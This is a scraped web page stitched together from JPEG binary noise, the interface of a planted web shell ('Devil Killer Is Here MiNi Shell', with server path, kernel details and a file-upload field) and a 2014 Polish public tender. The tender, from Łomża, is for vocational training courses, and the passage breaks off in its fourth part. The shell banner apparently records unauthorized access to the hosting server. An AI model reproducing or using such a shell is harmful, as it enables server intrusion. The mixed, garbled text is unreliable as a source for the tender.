JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140703/143775-N-2014.html

<p class="kh_header"><b>Łomża: Zorganizowanie i przeprowadzenie kursów zawodowych dla uczestników projektu pn. Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym (osoby niepełnosprawne, bezrobotne, nieaktywne zawodowo, wychowankowie placówek opiekuńczo-wychowawczych, opiekunowie dzieci niepełnosprawnych) w ramach Poddziałania 7.1.2 Działanie 7.1 Priorytet VII Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 143775 - 2014; data zamieszczenia: 03.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży , ul. Szosa Zambrowska 1/27, 18-400 Łomża, woj. podlaskie, tel. (086) 215 69 42, faks (086) 215 69 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiatlomzynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów zawodowych dla uczestników projektu pn. Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym (osoby niepełnosprawne, bezrobotne, nieaktywne zawodowo, wychowankowie placówek opiekuńczo-wychowawczych, opiekunowie dzieci niepełnosprawnych) w ramach Poddziałania 7.1.2 Działanie 7.1 Priorytet VII Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu kursów uczestników projektu Razem ku samodzielności (osoby niepełnosprawne, bezrobotne, nieaktywne zawodowo, wychowankowie placówek opiekuńczo-wychowawczych, opiekunowie dzieci niepełnosprawnych),  kursów zawodowych wyszczególnionych w poniżej:

CZĘŚĆ ZAMÓWIENIA: I

Kurs spawania metodą MAG - ilość osób: 9
Kurs spawania metodą TIG - ilość osób: 4
Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: Program zgodny z wytycznymi Instytutu Spawalnictwa, kurs zakończony egzaminem przeprowadzonym przed komisją z Instytutu spawalnictwa
Termin realizacji usługi: od 01.VIII - 15.IX.2014, z pominięciem dni od 15 do 31 sierpnia 2014r.

CZĘŚĆ ZAMÓWIENIA: II

Kasa fiskalna z obsługą terminali i kart płatniczych - ilość osób: 48
Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 15  godzin dydaktycznych; dla każdego uczestnika oddzielna kasa fiskalna, przynajmniej 4 grupy szkoleniowe po 12 osób. 
I grupa zajęcia w lipcu w godzinach 9.00 - 15.00 x 2dni (zajęcia co drugi dzień) w terminie od 21 lipca do 25 lipca. 
II grupa zajęcia w lipcu w godzinach 15.00 - 19.00 x 3 dni (zajęcia co drugi dzień) w terminie od 21 lipca do 30 lipca, naprzemiennie z grupą III. 
III grupa zajęcia w lipcu w godzinach 15.00 - 19.00 x 3 dni (zajęcia co drugi dzień) w terminie od 21 lipca do 30 lipca, naprzemiennie z grupą II. 
IV grupa zajęcia we wrześniu w godzinach 15.00 - 19.00 x 3 dni (co drugi dzień). 
Termin realizacji usługi: 21.VII - 10.IX.2014

CZĘŚĆ ZAMÓWIENIA: III

Sprzedawca + fakturowanie - ilość osób: 6
Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 60 godzin dydaktycznych; dla każdego uczestnika oddzielne stanowisko komputerowe do nauki fakturowania, Zajęcia  od 9.00 - 14.00 (codziennie). 
 Termin realizacji usługi: 28.VII - 14.VIII.2014

CZĘŚĆ ZAMÓWIENIA: IV

Kurs opiekuna osób zależnych (opiekun osób starszych / chorych / niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy) - ilość osób: 11
Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 120 godzin 
(w tym co najmniej 80 godzin praktycznych - 40 godzin w przedszkolu / żłobku i 40 godzin w instytucji opiekującej się osobami starszymi). Zajęcia w godzinach 9.00 - 16.00 (codziennie).
Termin realizacji usługi: 21.VII - 5.IX.2014 z pominięciem dni od 15 do 30 sierpnia)

CZĘŚĆ ZAMÓWIENIA: V

Kelner-barman - ilość osób: 9
Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 120 godzin, w tym nie mniej niż 100 godzin zajęć praktycznych. Zajęcia w godzinach 8.00 - 16.00 w dni robocze (od poniedziałku do piątku).
Termin realizacji usługi: 21.VII - 14.VIII.2014

CZĘŚĆ ZAMÓWIENIA: VI

Kurs kosmetyczny z elementami wizażu - ilość osób: 5
Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 120 godzin, 3 moduły: wizaż i pielęgnacja twarzy; depilacja woskiem; stylizacja i pielęgnacja paznokci. Zajęcia w godzinach 8.00 - 16.00 w dni robocze.
Termin realizacji usługi: 29.VII - 14.VIII.2014

CZĘŚĆ ZAMÓWIENIA: VII

AUTOCAD I, AUTOCAD II - ilość osób: 2
Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 70 godzin w tym 35 godzin dydaktycznych na każdy moduł szkolenia. Zajęcia w godzinach 9.00 - 15.00 w dni robocze.
Termin realizacji usługi: od 01.VIII do 14.VIII.2014.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie co najmniej jedną usługę polegającą na zorganizowaniu i przeprowadzeniu kursu zawodowego zgodnego z przedmiotem zamówienia, na który składana jest oferta.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, co najmniej na kwotę 50.000 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej jedną usługę polegającą na zorganizowaniu i przeprowadzeniu kursu zawodowego zgodnego z przedmiotem zamówienia, na który składana jest oferta.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć harmonogram kursu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana ilości uczestników kursu - rezygnacja, usunięcie, itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiatlomzynski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży, 18 - 400 Łomża, ul. Szosa Zambrowska 1/27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2014 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Łomży, 18 - 400 Łomża, ul. Szosa Zambrowska 1/27 - w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs spawania metodą MAG (135) i TIG (141).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kurs spawania metodą MAG (135)
LICZBA  UCZESTNIKÓW: 9
TERMIN  REALIZACJI USŁUGI : od 1 sierpnia  do  15 września  2014  z pominięciem dni od 15 do 31 sierpnia 2014r.
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA: uzyskanie uprawnień spawalniczych w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG-135 
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze, : od 1 sierpnia  do 14 sierpnia w godzinach od 8.00 do 16.00  natomiast od 1 września do 15 września w systemie popołudniowym. 

2.Kurs spawania metodą TIG (141)
LICZBA UCZESTNIKÓW: 4
TERMIN  REALIZACJI USŁUGI : od 1 sierpnia  do  15 września  2014  z pominięciem dni od 15 do 31 sierpnia 2014r.
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA: uzyskanie uprawnień spawalniczych w zakresie spawania blach i rur spoinami pachwinowymi metodą TIG-141.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze, : od 1 sierpnia  do 14 sierpnia w godzinach od 8.00 do 16.00  natomiast od 1 września do 15 września w systemie popołudniowym. 

WYMAGANIA DODATKOWE:
a) Program szkolenia z zakresu spawania musi być zgodny z wytycznymi Instytutu Spawalnictwa 
b) Wykonawca skieruje każdego z uczestników projektu na obowiązkowe badania lekarskie uprawniające do uczestnictwa w kursie
c) Baza szkoleniowa do przeprowadzenia zajęć znajdująca się na terenie Miasta Łomża w szczególności musi być zgodna
z wymaganiami instytucji uprawnionych do wydawania atestów/certyfikatów  na prowadzenie szkoleń i egzaminów spawaczy, uzyskanych na podstawie wymagań instytucji podległych Ministrowi Gospodarki lub innemu właściwemu,
z Rozporządzeniem Ministra Gospodarki z 27.04.2000 w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. z 2000 r., Nr 40, poz.470).
d) Kurs będzie kończyć się egzaminem zewnętrznym przeprowadzanym przez komisję powołaną przez Instytut Spawalnictwa w Gliwicach. zgodnie z Wytycznymi Instytutu Spawalnictwa w Gliwicach;
e) Oprócz certyfikatów kursanci otrzymają Książeczki Spawacza ze stosownym wpisem zgodnym z polską Normą wg wskazań Instytutu Spawalnictwa w Gliwicach oraz Euro świadectwem w języku polskim i angielskim ze stosownym wpisem do książeczki Spawacza przedstawiciela PRS..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa kasy fiskalnej i terminali kart płatniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LICZBA UCZESTNIKÓW: 48 - 4 grupy szkoleniowe po 12 osób.
TERMIN  REALIZACJI USŁUGI : od 21.07.2014 do 10.09.2014
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: nabycie praktycznych umiejętności posługiwania się kasą fiskalną i terminalami kart płatniczych
ORGANIZACJA SZKOLENIA: szkolenie ma obejmować 15 godzin dydaktycznych - 4 grupy szkoleniowe po 12 osób; dla każdego uczestnika oddzielna kasa fiskalna,  zajęcia skumulowane, przeprowadzone w ciągu 2 dni roboczych w godz. od 9:00 do 15:00, lub w ciągu 3 dni roboczych w godz. 15.00 - 19.00. 

I grupa zajęcia w lipcu w godzinach 9.00 - 15.00 x 2dni (zajęcia co drugi dzień) w terminie od 21 lipca do 25 lipca
II grupa zajęcia w lipcu w godzinach 15.00 - 19.00 x 3 dni (zajęcia co drugi dzień) (w terminie od 21 lipca do 30 lipca) naprzemiennie z grupą III
III grupa zajęcia w lipcu w godzinach 15.00 - 19.00 x 3 dni (zajęcia co drugi dzień) (w terminie od 21 lipca do 30 lipca) naprzemiennie z grupą II
IV grupa zajęcia we wrześniu w godzinach 15.00 - 19.00 x 3 dni (co drugi dzień)

WYMAGANIA DODATKOWE: 
Program powinien zawierać:
Kurs obsługa kasy fiskalnej + terminali kart płatniczych:
a) budowy kas fiskalnych
b) pracy przy kasie fiskalnej - rejestracji sprzedaży i programowania kas fiskalnych
c) obsługi urządzeń dodatkowych wspomagających pracę kasjera, w tym terminali kart płatniczych
d) obsługi kas fiskalnych w połączeniu z komputerowym systemem obsługi sprzedaży
W trakcie zajęć praktycznych - dotyczy obsługi kasy fiskalnej - wykonawca zapewnia 1 jedno stanowisko kasy fiskalnej dla każdego uczestnika szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzedawca z fakturowaniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LICZBA UCZESTNIKÓW: 6
TERMIN  REALIZACJI USŁUGI : od 28 lipca 14 sierpień 2014
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: przygotowanie uczestników szkolenia do pracy w zawodzie sprzedawcy ora fakturzystki
ORGANIZACJA SZKOLENIA: szkolenie ma obejmować 60 godzin dydaktycznych moduł sprzedawca 20 godzin, moduł fakturowanie 40 godzin i musi zawierać w programie min.: obsługę programu Symfonia - faktura, faktury VAT, ; dla każdego uczestnika oddzielne stanowisko komputerowe do nauki fakturowania,  zajęcia skumulowane, przeprowadzone w dni roboczych w godz. od 9:00 do 14:00,istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze,  4-5 razy w tygodniu w godz. od 9:00 do 14:00, od dnia zakończenia kursu kasa fiskalna dla grupy III do 14 sierpień 2014.

WYMAGANIA DODATKOWE: 
Program powinien zawierać:
kurs sprzedawca+fakturowanie
a) minimum sanitarnego
b) technik sprzedaży
c) obsługi klienta z wykorzystaniem aktywnych metod sprzedaży
d) pozyskiwania i obsługi nabywców
e) przyjmowania dostaw towarów oraz ich przygotowanie do sprzedaży
f) dokumentowania obrotu towaru, operacji rachunkowo - kasowych
g) marketingu i reklamy
h) fakturowanie i dokumentowanie sprzedaży
i) obsługa programów komputerowych służących do fakturowania
j) obsługa programu Symfonia - faktura
k) faktury VAT (min 5 godzin)
W trakcie zajęć praktycznych - dotyczy wykorzystania programów do fakturowania- wykonawca zapewnia 1 stanowisko komputerowe dla każdego uczestnika szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs opiekun osób zależnych (opiekun osób starszych/chorych/niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LICZBA UCZESTNIKÓW: 11
TERMIN  REALIZACJI USŁUGI : 21 VII- 5 IX 2014
Z pominięciem dni od 15 do 30 sierpnia)
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  przygotowanie uczestników do udzielania pomocy i świadczenia usług opiekuńczych w odniesieniu do osób przewlekle chorych, samotnych i niesamodzielnych oraz opieki nad dzieckiem
